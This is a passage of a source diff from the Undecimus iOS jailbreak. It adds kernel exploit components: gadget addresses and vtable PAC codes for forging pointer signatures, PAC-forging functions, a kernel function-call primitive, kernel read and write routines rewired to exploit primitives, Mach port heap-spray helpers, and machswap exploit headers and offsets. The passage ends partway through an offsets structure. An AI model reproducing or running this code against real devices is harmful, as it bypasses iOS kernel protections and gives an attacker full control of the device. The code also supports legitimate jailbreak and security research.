+    ADDRESS(mov_x10_x3__br_x6)                              = getoffset(mov_x10_x3__br_x6);
+    ADDRESS(kernel_forge_pacia_gadget)                      = getoffset(kernel_forge_pacia_gadget);
+    ADDRESS(kernel_forge_pacda_gadget)                      = getoffset(kernel_forge_pacda_gadget);
+    SIZE(kernel_forge_pacxa_gadget_buffer)                  = 0x110;
+    OFFSET(kernel_forge_pacxa_gadget_buffer, first_access)  = 0xe8;
+    OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result)  = 0xf0;
+    OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result)  = 0xe8;
+    ADDRESS(IOUserClient__vtable)                           = getoffset(IOUserClient__vtable);
+    ADDRESS(IORegistryEntry__getRegistryEntryID)            = getoffset(IORegistryEntry__getRegistryEntryID);
+}
+
+// A list of address initializations by platform.
+static struct initialization addresses[] = {
+	{ "*", "16A366-16D5024a", addresses__iphone11_2__16A366  },
+};
+
+// ---- PAC initialization ------------------------------------------------------------------------
+
+#if __arm64e__
+
+static void
+pac__iphone11_8__16C50() {
+	INIT_VTABLE_PAC_CODES(IOAudio2DeviceUserClient,
+			0x3771, 0x56b7, 0xbaa2, 0x3607, 0x2e4a, 0x3a87, 0x89a9, 0xfffc,
+			0xfc74, 0x5635, 0xbe60, 0x32e5, 0x4a6a, 0xedc5, 0x5c68, 0x6a10,
+			0x7a2a, 0xaf75, 0x137e, 0x0655, 0x43aa, 0x12e9, 0x4578, 0x4275,
+			0xff53, 0x1814, 0x122e, 0x13f6, 0x1d35, 0xacb1, 0x7eb0, 0x1262,
+			0x82eb, 0x164e, 0x37a5, 0xb659, 0x6c51, 0xa20f, 0xb3b6, 0x6bcb,
+			0x5a20, 0x5062, 0x00d7, 0x7c85, 0x8a26, 0x3539, 0x688b, 0x1e60,
+			0x1955, 0x0689, 0xc256, 0xa383, 0xf021, 0x1f0a, 0xb4bb, 0x8ffc,
+			0xb5b9, 0x8764, 0x5d96, 0x80d9, 0x0c9c, 0x5d0a, 0xcbcc, 0x617d,
+			0x848a, 0x2312, 0x3540, 0xc257, 0x3025, 0x9fc2, 0x5038, 0xc666,
+			0x6cc3, 0x550c, 0xa19a, 0xa51b, 0x4577, 0x573c, 0x1a4e, 0x6c3d,
+			0xb049, 0xc4b2, 0xc90d, 0x7d59, 0x4897, 0x3c68, 0xb085, 0x4529,
+			0x639f, 0xccfb, 0x55eb, 0xe933, 0xaec3, 0x5ec5, 0x5219, 0xc6b2,
+			0x8a43, 0x4a20, 0xd9f2, 0x981a, 0xa27f, 0xc4f9, 0x6b87, 0x60a1,
+			0x7e78, 0x36aa, 0x86ef, 0x9be9, 0x7318, 0x93b7, 0x638e, 0x61a6,
+			0x9175, 0x136b, 0xdb58, 0x4a31, 0x0988, 0x5393, 0xabe0, 0x0ad9,
+			0x6c99, 0xd52d, 0xe213, 0x308f, 0xd78d, 0x3a1d, 0xa390, 0x240b,
+			0x1b89, 0x8d3c, 0x2652, 0x7f14, 0x0759, 0x63c4, 0x800f, 0x9cc2,
+			0x02ac, 0x785f, 0xcc6b, 0x82cd, 0x808e, 0x37ce, 0xa4c7, 0xe8de,
+			0xa343, 0x4bc0, 0xf8a6, 0xac7f, 0x7974, 0xea1b, 0x4b35, 0x9eb4,
+			0x595a, 0x5b2b, 0x699e, 0x2b52, 0xf40e, 0x0ddb, 0x0f88, 0x8700,
+			0x36c3, 0x058e, 0xf16e, 0x3a71, 0xda1e, 0x10b6, 0x8654, 0xb352,
+			0xa03f, 0xbde5, 0x5cf5, 0x18b8, 0xea14, 0x3e51, 0xbcef, 0xfd2b,
+			0xc1ba, 0x02d4, 0xee4f, 0x3565, 0xb50c, 0xbdaa, 0xbc5e, 0xea23,
+			0x2bcb);
+  
+  INIT_VTABLE_PAC_CODES(IODTNVRAM,
+      0x3771, 0x56b7, 0xbaa2, 0x3607, 0x2e4a, 0x3a87, 0x89a9, 0xfffc,
+      0xfc74, 0x5635, 0xbe60, 0x32e5, 0x4a6a, 0xedc5, 0x5c68, 0x6a10,
+      0x7a2a, 0xaf75, 0x137e, 0x0655, 0x43aa, 0x12e9, 0x4578, 0x4275,
+      0xff53, 0x1814, 0x122e, 0x13f6, 0x1d35, 0xacb1, 0x7eb0, 0x1262,
+      0x82eb, 0x164e, 0x37a5, 0xb659, 0x6c51, 0xa20f, 0xb3b6, 0x6bcb,
+      0x5a20, 0x5062, 0x00d7, 0x7c85, 0x8a26, 0x3539, 0x688b, 0x1e60,
+      0x1955, 0x0689, 0xc256, 0xa383, 0xf021, 0x1f0a, 0xb4bb, 0x8ffc,
+      0xb5b9, 0x8764, 0x5d96, 0x80d9, 0x0c9c, 0x5d0a, 0xcbcc, 0x617d,
+      0x848a, 0x2312, 0x3540, 0xc257, 0x3025, 0x9fc2, 0x5038, 0xc666,
+      0x6cc3, 0x550c, 0xa19a, 0xa51b, 0x4577, 0x573c, 0x1a4e, 0x6c3d,
+      0xb049, 0xc4b2, 0xc90d, 0x7d59, 0x4897, 0x3c68, 0xb085, 0x4529,
+      0x639f, 0xccfb, 0x55eb, 0xe933, 0xaec3, 0x5ec5, 0x5219, 0xc6b2,
+      0x8a43, 0x4a20, 0xd9f2, 0x981a, 0xa27f, 0xc4f9, 0x6b87, 0x60a1,
+      0x7e78, 0x36aa, 0x86ef, 0x9be9, 0x7318, 0x93b7, 0x638e, 0x61a6,
+      0x9175, 0x136b, 0xdb58, 0x4a31, 0x0988, 0x5393, 0xabe0, 0x0ad9,
+      0x6c99, 0xd52d, 0xe213, 0x308f, 0xd78d, 0x3a1d, 0xa390, 0x240b,
+      0x1b89, 0x8d3c, 0x2652, 0x7f14, 0x0759, 0x63c4, 0x800f, 0x9cc2,
+      0x02ac, 0x785f, 0xcc6b, 0x82cd, 0x808e, 0x37ce, 0xa4c7, 0xe8de,
+      0xa343, 0x4bc0, 0xf8a6, 0xac7f, 0x7974, 0xea1b, 0x4b35, 0x9eb4,
+      0x595a, 0x5b2b, 0x699e, 0x2b52, 0xf40e, 0x0ddb, 0x0f88, 0x8700,
+      0x36c3, 0x058e, 0xf16e, 0x3a71, 0xda1e, 0x10b6, 0x8654, 0xb428,
+      0xbd46, 0xe5f5, 0x61a4, 0xdb15, 0x414e, 0xebdb, 0x5599, 0x4584,
+      0x4909, 0x003b, 0xafd8, 0xf53e, 0xfbd7, 0xcf34, 0x14d5, 0xb201,
+      0x3e63, 0x110c, 0x7ed3, 0x6731, 0x7a38, 0xd4c7, 0xa3bc, 0xc7b7,
+      0xb1db, 0x7d35, 0xb06d, 0xcf08);
+}
+
+// A list of PAC initializations by platform.
+static struct initialization pac_codes[] = {
+	{ "*", "*", pac__iphone11_8__16C50 },
+};
+
+#endif // __arm64e__
+
+// ---- Public API --------------------------------------------------------------------------------
+
+bool
+kernel_call_parameters_init() {
+	bool ok = kernel_slide_init();
+	if (!ok) {
+		return false;
+	}
+	size_t count = run_initializations(offsets, ARRAY_COUNT(offsets));
+	if (count < 1) {
+		ERROR("no kernel_call %s for %s %s", "offsets",
+				platform.machine, platform.osversion);
+		return false;
+	}
+	count = run_initializations(addresses, ARRAY_COUNT(addresses));
+	if (count < 1) {
+		ERROR("no kernel_call %s for %s %s", "addresses",
+				platform.machine, platform.osversion);
+		return false;
+	}
+#if __arm64e__
+	count = run_initializations(pac_codes, ARRAY_COUNT(pac_codes));
+	if (count < 1) {
+		ERROR("no kernel_call %s for %s %s", "PAC codes",
+				platform.machine, platform.osversion);
+		return false;
+	}
+#endif // __arm64e__
+	return true;
+}

Undecimus/source/kc_parameters.h

@@ -0,0 +1,92 @@
+/*
+ * kernel_call/kc_parameters.h
+ * Brandon Azad
+ */
+#ifndef VOUCHER_SWAP__KERNEL_CALL__KC_PARAMETERS_H_
+#define VOUCHER_SWAP__KERNEL_CALL__KC_PARAMETERS_H_
+
+#include <stdbool.h>
+#include <stddef.h>
+#include <stdint.h>
+
+#include "parameters.h"
+
+#ifdef KERNEL_CALL_PARAMETERS_EXTERN
+#define extern KERNEL_CALL_PARAMETERS_EXTERN
+#endif
+
+// A structure describing the PAC codes used as part of the context for signing and verifying
+// virtual method pointers in a vtable.
+struct vtable_pac_codes {
+	size_t count;
+	const uint16_t *codes;
+};
+
+// Generate the name for an offset in a virtual method table.
+#define VTABLE_INDEX(class_, method_)	_##class_##_##method_##__vtable_index_
+
+// Generate the name for a list of vtable PAC codes.
+#define VTABLE_PAC_CODES(class_)	_##class_##__vtable_pac_codes_
+
+// A helper macro for INIT_VTABLE_PAC_CODES().
+#define VTABLE_PAC_CODES_DATA(class_)	_##class_##__vtable_pac_codes_data_
+
+// Initialize a list of vtable PAC codes. In order to store the PAC code array in constant memory,
+// we place it in a static variable. Consequently, this macro will produce name conflicts if used
+// outside a function.
+#define INIT_VTABLE_PAC_CODES(class_, ...)						\
+	static const uint16_t VTABLE_PAC_CODES_DATA(class_)[] = { __VA_ARGS__ };	\
+	VTABLE_PAC_CODES(class_) = (struct vtable_pac_codes) {				\
+		.count = sizeof(VTABLE_PAC_CODES_DATA(class_)) / sizeof(uint16_t),	\
+		.codes = (const uint16_t *) VTABLE_PAC_CODES_DATA(class_),		\
+	}
+
+extern uint64_t ADDRESS(paciza_pointer__l2tp_domain_module_start);
+extern uint64_t ADDRESS(paciza_pointer__l2tp_domain_module_stop);
+extern uint64_t ADDRESS(l2tp_domain_inited);
+extern uint64_t ADDRESS(sysctl__net_ppp_l2tp);
+extern uint64_t ADDRESS(sysctl_unregister_oid);
+extern uint64_t ADDRESS(mov_x0_x4__br_x5);
+extern uint64_t ADDRESS(mov_x9_x0__br_x1);
+extern uint64_t ADDRESS(mov_x10_x3__br_x6);
+extern uint64_t ADDRESS(kernel_forge_pacia_gadget);
+extern uint64_t ADDRESS(kernel_forge_pacda_gadget);
+extern uint64_t ADDRESS(IOUserClient__vtable);
+extern uint64_t ADDRESS(IORegistryEntry__getRegistryEntryID);
+
+extern size_t SIZE(kernel_forge_pacxa_gadget_buffer);
+extern size_t OFFSET(kernel_forge_pacxa_gadget_buffer, first_access);
+extern size_t OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result);
+extern size_t OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result);
+
+extern struct vtable_pac_codes VTABLE_PAC_CODES(IOAudio2DeviceUserClient);
+extern struct vtable_pac_codes VTABLE_PAC_CODES(IODTNVRAM);
+
+// Parameters for IOAudio2DeviceUserClient.
+extern size_t OFFSET(IOAudio2DeviceUserClient, traps);
+
+// Parameters for IOExternalTrap.
+extern size_t SIZE(IOExternalTrap);
+extern size_t OFFSET(IOExternalTrap, object);
+extern size_t OFFSET(IOExternalTrap, function);
+extern size_t OFFSET(IOExternalTrap, offset);
+
+// Parameters for IORegistryEntry.
+extern size_t OFFSET(IORegistryEntry, reserved);
+extern size_t OFFSET(IORegistryEntry__ExpansionData, fRegistryEntryID);
+
+// Parameters for IOUserClient.
+extern uint32_t VTABLE_INDEX(IOUserClient, getExternalTrapForIndex);
+extern uint32_t VTABLE_INDEX(IOUserClient, getTargetAndTrapForIndex);
+
+/*
+ * kernel_call_parameters_init
+ *
+ * Description:
+ * 	Initialize the addresses used in the kernel_call subsystem.
+ */
+bool kernel_call_parameters_init(void);
+
+#undef extern
+
+#endif

Undecimus/source/kernel_alloc.c

@@ -14,6 +14,7 @@
 #include "log.h"
 #include "parameters.h"
 #include "platform.h"
+#include "common.h"
 
 // Compute the minimum of 2 values.
 #define min(a, b) ((a) < (b) ? (a) : (b))
@@ -108,9 +109,7 @@ ool_ports_spray_port(mach_port_t holding_port,
 		}
 	}
 	// Clean up the allocated ports.
-	if (alloc_ports != NULL) {
-		free(alloc_ports);
-	}
+    SafeFreeNULL(alloc_ports);
 	// Return the number of messages we sent.
 	return messages_sent;
 }
@@ -357,7 +356,7 @@ ool_ports_spray_size_with_gc(mach_port_t *holding_ports, size_t *holding_port_co
 	for (; ports_used < port_count && ools_left > 0; ports_used++) {
 		// Spray this port one message at a time until we've maxed out its queue.
 		size_t messages_sent = 0;
-		for (; messages_sent < (kCFCoreFoundationVersionNumber >= 1535.12 ? MACH_PORT_QLIMIT_MAX : MACH_PORT_QLIMIT_DEFAULT) && ools_left > 0; messages_sent++) {
+		for (; messages_sent < (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? MACH_PORT_QLIMIT_MAX : MACH_PORT_QLIMIT_DEFAULT) && ools_left > 0; messages_sent++) {
 			// If we've crossed the GC sleep boundary, sleep for a bit and schedule the
 			// next one.
 			if (sprayed >= next_gc_step) {
@@ -399,7 +398,7 @@ port_drain_messages(mach_port_t port, void (^message_handler)(mach_msg_header_t
 		| MACH_RCV_TRAILER_TYPE(MACH_MSG_TRAILER_FORMAT_0)
 		| MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_NULL);
 	// Allocate an initial message buffer.
-	mach_msg_size_t msg_size = (mach_msg_size_t)page_size;
+	mach_msg_size_t msg_size = 0x4000;
 	mach_msg_base_t *msg = malloc(msg_size);
 	assert(msg != NULL);
 	// Loop through all the messages queued on the port.
@@ -422,7 +421,7 @@ port_drain_messages(mach_port_t port, void (^message_handler)(mach_msg_header_t
 			}
 			// The buffer was too small, increase it.
 			msg_size = msg->header.msgh_size + REQUESTED_TRAILER_SIZE(options);
-			free(msg);
+			SafeFreeNULL(msg);
 			msg = malloc(msg_size);
 			assert(msg != NULL);
 		}
@@ -439,7 +438,7 @@ port_drain_messages(mach_port_t port, void (^message_handler)(mach_msg_header_t
 		message_handler(&msg->header);
 	}
 	// Clean up resources.
-	free(msg);
+    SafeFreeNULL(msg);
 }
 
 void

Undecimus/source/kernel_alloc.h

@@ -165,7 +165,7 @@ size_t ool_ports_spray_size_with_gc(mach_port_t *holding_ports, size_t *holding_
  *
  * Description:
  * 	Create an array of Mach ports. The Mach ports are receive rights only. Once the array is no
- * 	longer needed, deallocate it with free().
+ * 	longer needed, deallocate it with SafeFreeNULL().
  */
 mach_port_t *create_ports(size_t count);
 

Undecimus/source/kernel_call.c

@@ -0,0 +1,44 @@
+/*
+ * kernel_call.c
+ * Brandon Azad
+ */
+#include "kernel_call.h"
+
+#include <assert.h>
+
+#include "pac.h"
+#include "user_client.h"
+#include "log.h"
+
+// ---- Public API --------------------------------------------------------------------------------
+
+bool
+kernel_call_init() {
+	bool ok = stage1_kernel_call_init()
+		&& stage2_kernel_call_init()
+		&& stage3_kernel_call_init();
+	if (!ok) {
+		kernel_call_deinit();
+	}
+	return ok;
+}
+
+void
+kernel_call_deinit() {
+	stage3_kernel_call_deinit();
+	stage2_kernel_call_deinit();
+	stage1_kernel_call_deinit();
+}
+
+uint32_t
+kernel_call_7(uint64_t function, size_t argument_count, ...) {
+	assert(argument_count <= 7);
+	uint64_t arguments[7];
+	va_list ap;
+	va_start(ap, argument_count);
+	for (size_t i = 0; i < argument_count && i < 7; i++) {
+		arguments[i] = va_arg(ap, uint64_t);
+	}
+	va_end(ap);
+	return kernel_call_7v(function, argument_count, arguments);
+}

Undecimus/source/kernel_call.h

@@ -0,0 +1,93 @@
+/*
+ * kernel_call.h
+ * Brandon Azad
+ */
+#ifndef VOUCHER_SWAP__KERNEL_CALL_H_
+#define VOUCHER_SWAP__KERNEL_CALL_H_
+
+#include <stdbool.h>
+#include <stddef.h>
+#include <stdint.h>
+
+/*
+ * kernel_call_init
+ *
+ * Description:
+ * 	Initialize kernel_call functions.
+ */
+bool kernel_call_init(void);
+
+/*
+ * kernel_call_deinit
+ *
+ * Description:
+ * 	Deinitialize the kernel call subsystem and restore the kernel to a safe state.
+ */
+void kernel_call_deinit(void);
+
+/*
+ * kernel_call_7
+ *
+ * Description:
+ * 	Call a kernel function with the specified arguments.
+ *
+ * Restrictions:
+ * 	See kernel_call_7v().
+ */
+uint32_t kernel_call_7(uint64_t function, size_t argument_count, ...);
+
+/*
+ * kernel_call_7v
+ *
+ * Description:
+ * 	Call a kernel function with the specified arguments.
+ *
+ * Restrictions:
+ * 	At most 7 arguments can be passed.
+ * 	arguments[0] must be nonzero.
+ * 	The return value is truncated to 32 bits.
+ */
+uint32_t kernel_call_7v(uint64_t function, size_t argument_count, const uint64_t arguments[]);
+
+/*
+ * kernel_forge_pacia
+ *
+ * Description:
+ * 	Forge a PACIA pointer using the kernel forging gadget.
+ */
+uint64_t kernel_forge_pacia(uint64_t pointer, uint64_t context);
+
+/*
+ * kernel_forge_pacia_with_type
+ *
+ * Description:
+ * 	Forge a PACIA pointer using the specified address, with the upper 16 bits replaced by the
+ * 	type code, as context.
+ */
+uint64_t kernel_forge_pacia_with_type(uint64_t pointer, uint64_t address, uint16_t type);
+
+/*
+ * kernel_forge_pacda
+ *
+ * Description:
+ * 	Forge a PACDA pointer using the kernel forging gadget.
+ */
+uint64_t kernel_forge_pacda(uint64_t pointer, uint64_t context);
+
+/*
+ * kernel_xpaci
+ *
+ * Description:
+ * 	Strip a PACIx code from a kernel pointer.
+ */
+uint64_t kernel_xpaci(uint64_t pointer);
+
+/*
+ * kernel_xpacd
+ *
+ * Description:
+ * 	Strip a PACDx code from a kernel pointer.
+ */
+uint64_t kernel_xpacd(uint64_t pointer);
+
+#endif

Undecimus/source/kernel_memory.c

@@ -13,32 +13,14 @@
 
 bool
 kernel_read(uint64_t address, void *data, size_t size) {
-	mach_vm_size_t size_out;
-	kern_return_t kr = mach_vm_read_overwrite(kernel_task_port, address,
-			size, (mach_vm_address_t) data, &size_out);
-	if (kr != KERN_SUCCESS) {
-		ERROR("%s returned %d: %s", "mach_vm_read_overwrite", kr, mach_error_string(kr));
-		ERROR("could not %s address 0x%016llx", "read", address);
-		return false;
-	}
-	if (size_out != size) {
-		ERROR("partial read of address 0x%016llx: %llu of %zu bytes",
-				address, size_out, size);
-		return false;
-	}
-	return true;
+    extern bool rkbuffer(uint64_t kaddr, void* buffer, size_t length);
+    return rkbuffer(address, data, size);
 }
 
 bool
 kernel_write(uint64_t address, const void *data, size_t size) {
-	kern_return_t kr = mach_vm_write(kernel_task_port, address,
-			(mach_vm_address_t) data, (mach_msg_size_t) size);
-	if (kr != KERN_SUCCESS) {
-		ERROR("%s returned %d: %s", "mach_vm_write", kr, mach_error_string(kr));
-		ERROR("could not %s address 0x%016llx", "write", address);
-		return false;
-	}
-	return true;
+    extern bool wkbuffer(uint64_t kaddr, void* buffer, size_t length);
+    return wkbuffer(address, (void *)data, size);
 }
 
 uint8_t

Undecimus/source/kernel_slide.c

@@ -14,6 +14,8 @@
 #include "parameters.h"
 #include "platform.h"
 
+uint64_t kernel_slide = -1;
+
 /*
  * is_kernel_base
  *
@@ -43,7 +45,7 @@ is_kernel_base(uint64_t base) {
 
 bool
 kernel_slide_init() {
-	if (kernel_slide != 0) {
+	if (kernel_slide != -1) {
 		return true;
 	}
 	// Get the address of the host port.
@@ -63,7 +65,7 @@ kernel_slide_init() {
 
 bool
 kernel_slide_init_with_kernel_image_address(uint64_t address) {
-	if (kernel_slide != 0) {
+	if (kernel_slide != -1) {
 		return true;
 	}
 	// Find the highest possible kernel base address that could still correspond to the given
@@ -73,7 +75,7 @@ kernel_slide_init_with_kernel_image_address(uint64_t address) {
 	base = base + ((address - base) / kernel_slide_step) * kernel_slide_step;
 	// Now walk backwards from that kernel base one kernel slide at a time until we find the
 	// real kernel base.
-	while (base > STATIC_ADDRESS(kernel_base)) {
+	while (base >= STATIC_ADDRESS(kernel_base)) {
 		bool found = is_kernel_base(base);
 		if (found) {
 			kernel_slide = base - STATIC_ADDRESS(kernel_base);

Undecimus/source/kernel_slide.h

@@ -8,10 +8,6 @@
 #include <stdbool.h>
 #include <stdint.h>
 
-#ifdef KERNEL_SLIDE_EXTERN
-#define extern KERNEL_SLIDE_EXTERN
-#endif
-
 /*
  * kernel_slide
  *

Undecimus/source/log.c

@@ -7,6 +7,7 @@
 #include <assert.h>
 #include <stdio.h>
 #include <stdlib.h>
+#import <common.h>
 
 void
 log_internal(char type, const char *format, ...) {
@@ -30,8 +31,8 @@ log_stderr(char type, const char *format, va_list ap) {
 		case 'W': type = '!'; break;
 		case 'E': type = '-'; break;
 	}
-	fprintf(stderr, "[%c] %s\n", type, message);
-	free(message);
+    RAWLOG("[%c] %s\n", type, message);
+	SafeFreeNULL(message);
 }
 
 void (*log_implementation)(char type, const char *format, va_list ap) = log_stderr;

Undecimus/source/lzssdec.cpp

@@ -1,263 +0,0 @@
-// (C)2009 Willem Hengeveld  itsme@xs4all.nl
-#include <stdio.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <stdint.h>
-#include <string.h>
-#include <algorithm>
-
-// streaming version of the lzss algorithm, as defined in BootX-75/bootx.tproj/sl.subproj/lzss.c
-// you can use lzssdec in a filter, like:
-//
-// cat file.lzss | lzssdec > file.decompressed
-//
-static int g_debug= 0;
-
-class lzssdecompress
-{
-    enum { COPYFROMDICT, EXPECTINGFLAG, PROCESSFLAGBIT, EXPECTING2NDBYTE };
-    int _state;
-    uint8_t _flags;
-    int _bitnr;
-    uint8_t *_src, *_srcend;
-    uint8_t *_dst, *_dstend;
-    uint8_t _firstbyte;
-    
-    uint8_t *_dict;
-    
-    int _dictsize;
-    int _maxmatch;
-    int _copythreshold;
-    
-    int _dictptr;
-    
-    int _copyptr;
-    int _copycount;
-    
-    int _inputoffset;
-    int _outputoffset;
-public:
-    lzssdecompress()
-    {
-        _maxmatch= 18;  // 4 bit size + threshold
-        _dictsize= 4096; // 12 bit size
-        _copythreshold= 3; // 0 == copy 3 bytes
-        _dict= new uint8_t[_dictsize+_maxmatch-1];
-        
-        reset();
-    }
-    ~lzssdecompress()
-    {
-        delete[] _dict;
-        _dict= 0; _dictsize= 0;
-    }
-    void reset()
-    {
-        _state=EXPECTINGFLAG;
-        _flags= 0; _bitnr= 0;
-        _src=_srcend=_dst=_dstend=0;
-        memset(_dict, ' ', _dictsize+_maxmatch-1);
-        _dictptr= _dictsize-_maxmatch;
-        _inputoffset= 0;
-        _outputoffset= 0;
-        _firstbyte= 0;
-        _copyptr= 0;
-        _copycount= 0;
-    }
-    void decompress(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused, uint8_t *src, uint32_t srclen, uint32_t *psrcused)
-    {
-        _src= src;  _srcend= src+srclen;
-        _dst= dst;  _dstend= dst+dstlen;
-        
-        while (_src<_srcend && _dst<_dstend)
-        {
-            switch(_state)
-            {
-                case EXPECTINGFLAG:
-                    if (g_debug) fprintf(stderr, "%08x,%08x: flag: %02x\n", _inputoffset, _outputoffset, *_src);
-                    _flags= *_src++;
-                    _inputoffset++;
-                    _bitnr= 0;
-                    _state= PROCESSFLAGBIT;
-                    break;
-                case PROCESSFLAGBIT:
-                    if (_flags&1) {
-                        if (g_debug) fprintf(stderr, "%08x,%08x: bit%d: %03x copybyte %02x\n", _inputoffset, _outputoffset, _bitnr, _dictptr, *_src);
-                        addtodict(*_dst++ = *_src++);
-                        _inputoffset++;
-                        _outputoffset++;
-                        nextflagbit();
-                    }
-                    else {
-                        _firstbyte= *_src++;
-                        _inputoffset++;
-                        _state= EXPECTING2NDBYTE;
-                    }
-                    break;
-                case EXPECTING2NDBYTE:
-                {
-                    uint8_t secondbyte= *_src++;
-                    _inputoffset++;
-                    setcounter(_firstbyte, secondbyte);
-                    if (g_debug) fprintf(stderr, "%08x,%08x: bit%d: %03x %02x %02x : copy %d bytes from %03x", _inputoffset-2, _outputoffset, _bitnr, _dictptr, _firstbyte, secondbyte, _copycount, _copyptr);
-                    if (g_debug) dumpcopydata();
-                    _state= COPYFROMDICT;
-                }
-                    break;
-                case COPYFROMDICT:
-                    copyfromdict();
-                    break;
-            }
-        }
-        if (g_debug) fprintf(stderr, "decompress state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount);
-        if (pdstused) *pdstused= _dst-dst;
-        if (psrcused) *psrcused= _src-src;
-    }
-    void flush(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused)
-    {
-        if (g_debug) fprintf(stderr, "flash before state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount);
-        _src= _srcend= NULL;
-        _dst= dst;  _dstend= dst+dstlen;
-        
-        if (_state==COPYFROMDICT)
-            copyfromdict();
-        
-        if (pdstused) *pdstused= _dst-dst;
-        if (g_debug) fprintf(stderr, "flash after state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount);
-    }
-    void copyfromdict()
-    {
-        while (_dst<_dstend && _copycount)
-        {
-            addtodict(*_dst++ = _dict[_copyptr++]);
-            _outputoffset++;
-            _copycount--;
-            _copyptr= _copyptr&(_dictsize-1);
-        }
-        if (_copycount==0)
-            nextflagbit();
-    }
-    void dumpcopydata()
-    {
-        // note: we are printing incorrect data, if _copyptr == _dictptr-1
-        for (int i=0 ; i<_copycount ; i++)
-            fprintf(stderr, " %02x", _dict[(_copyptr+i)&(_dictsize-1)]);
-        fprintf(stderr, "\n");
-    }
-    void addtodict(uint8_t c)
-    {
-        _dict[_dictptr++]= c;
-        _dictptr = _dictptr&(_dictsize-1);
-    }
-    void nextflagbit()
-    {
-        _bitnr++;
-        _flags>>=1;
-        _state = _bitnr==8 ? EXPECTINGFLAG : PROCESSFLAGBIT;
-    }
-    void setcounter(uint8_t first, uint8_t second)
-    {
-        _copyptr= first | ((second&0xf0)<<4);
-        _copycount= _copythreshold + (second&0xf);
-    }
-};
-
-void usage(int argc,char**argv)
-{
-    char *name = NULL;
-    name = strrchr(argv[0], '/');
-    fprintf(stderr, "Usage: %s [-d] [-o OFFSET] <kernelcache> <output>\n",(name ? name + 1: argv[0]));
-}
-extern "C" int lzssdec(int argc,char**argv)
-{
-    FILE *readFrom = NULL;
-    FILE *outputDir = NULL;
-    
-    //    _setmode(fileno(stdin),O_BINARY);
-    //    _setmode(fileno(stdout),O_BINARY);
-    
-#define HANDLEULOPTION(var, type) (argv[i][2] ? var= (type)strtoul(argv[i]+2, 0, 0) : i+1<argc ? var= (type)strtoul(argv[++i], 0, 0) : 0)
-    
-    uint32_t skipbytes=0;
-    if (argc < 2)
-    {
-        usage(argc, argv);
-        return 0;
-    }
-    for (int i=1 ; i<argc ; i++)
-    {
-        if (argv[i][0]=='-') switch(argv[i][1])
-        {
-            case 'd': g_debug++;
-                if (argv[i][2]=='d')
-                    g_debug++;
-                break;
-            case 'o': HANDLEULOPTION(skipbytes, uint32_t); break;
-            default:
-                usage(argc, argv);
-                return 1;
-        }
-        else if (argv[i][0]=='/') {
-            if (readFrom) {
-                printf("[lzss] Opening %s for writing\n", argv[i]);
-                outputDir = fopen(argv[i], "w+b");
-            }
-            else {
-                printf("[lzss] Opening %s for reading\n", argv[i]);
-                readFrom = fopen(argv[i], "rb");
-            }
-        }
-        else {
-            usage(argc, argv);
-            return 1;
-        }
-    }
-#define CHUNK 0x10000
-    
-    lzssdecompress lzss;
-    uint8_t *ibuf= (uint8_t*)malloc(CHUNK);
-    uint8_t *obuf= (uint8_t*)malloc(CHUNK);
-    
-    // skip first <skipbytes> bytes
-    while (skipbytes && !feof(readFrom)) {
-        int nr= fread(ibuf, 1, std::min(skipbytes,(uint32_t)CHUNK), readFrom);
-        skipbytes -= nr;
-    }
-    
-    while (!feof(readFrom))
-    {
-        size_t nr= fread(ibuf, 1, CHUNK, readFrom);
-        if (nr==0) {
-            perror("read");
-            return 1;
-        }
-        if (nr==0)
-            break;
-        
-        size_t srcp= 0;
-        while (srcp<nr) {
-            uint32_t dstused;
-            uint32_t srcused;
-            lzss.decompress(obuf, CHUNK, &dstused, ibuf+srcp, nr-srcp, &srcused);
-            srcp+=srcused;
-            size_t nw= fwrite(obuf, 1, dstused, outputDir);
-            if (nw<dstused) {
-                perror("write");
-                return 1;
-            }
-            if (g_debug) fprintf(stderr, "decompress: 0x%x -> 0x%x\n", srcused, dstused);
-        }
-    }
-    if (g_debug) fprintf(stderr, "done reading\n");
-    uint32_t dstused;
-    lzss.flush(obuf, CHUNK, &dstused);
-    size_t nw= fwrite(obuf, 1, dstused, outputDir);
-    if (nw<dstused) {
-        perror("write");
-        return 1;
-    }
-    
-    if (g_debug) fprintf(stderr, "flush: %d bytes\n", dstused);
-    
-    return 0;
-}

Undecimus/source/lzssdec.h

@@ -1,17 +0,0 @@
-//
-//  lzssdec.h
-//  Undecimus
-//
-//  Created by Pwn20wnd on 2/25/19.
-//  Copyright © 2019 Pwn20wnd. All rights reserved.
-//
-
-#ifndef lzssdec_h
-#define lzssdec_h
-
-#ifdef __cplusplus
-extern "C"
-#endif
-int lzssdec(int argc,char**argv);
-
-#endif /* lzssdec_h */

Undecimus/source/machswap2_pwn.h

@@ -0,0 +1,11 @@
+#ifndef MACHSWAP2_PWN_H
+#define MACHSWAP2_PWN_H
+
+#include <mach/mach.h>
+
+#include "common.h"
+#include "machswap_offsets.h"
+
+kern_return_t machswap2_exploit(machswap_offsets_t *offsets);
+
+#endif

Undecimus/source/machswap_offsets.h

@@ -0,0 +1,102 @@
+#ifndef MACHSWAP_OFFSETS_H
+#define MACHSWAP_OFFSETS_H
+
+typedef struct {
+    struct {
+        /* strings kernel | grep 'Darwin' */ 
+        const char *release;
+
+        cpu_type_t cpu_type;
+        /* CPU_SUBTYPE for supported */
+        cpu_subtype_t cpu_subtype;
+
+        /* basically will always be: 0xfffffff007004000 */
+        uint64_t kernel_image_base;
+    } constant;
+    
+    struct {
+        /* 
+            nm kernel | grep '_proc_pid'
+            'ldr w0, [x0, #offset]
+        */
+        uint32_t proc_pid;
+        
+        /*
+            nm kernel | grep '_proc_task'
+            'ldr x0, [x0, #offset]
+        */
+        uint32_t proc_task;
+        
+        /*
+            nm kernel | grep '_proc_ucred'
+            'ldr x0, [x0, #offset]
+        */
+        uint32_t proc_ucred;
+        
+        /*
+            nm kernel | grep '_get_task_map'
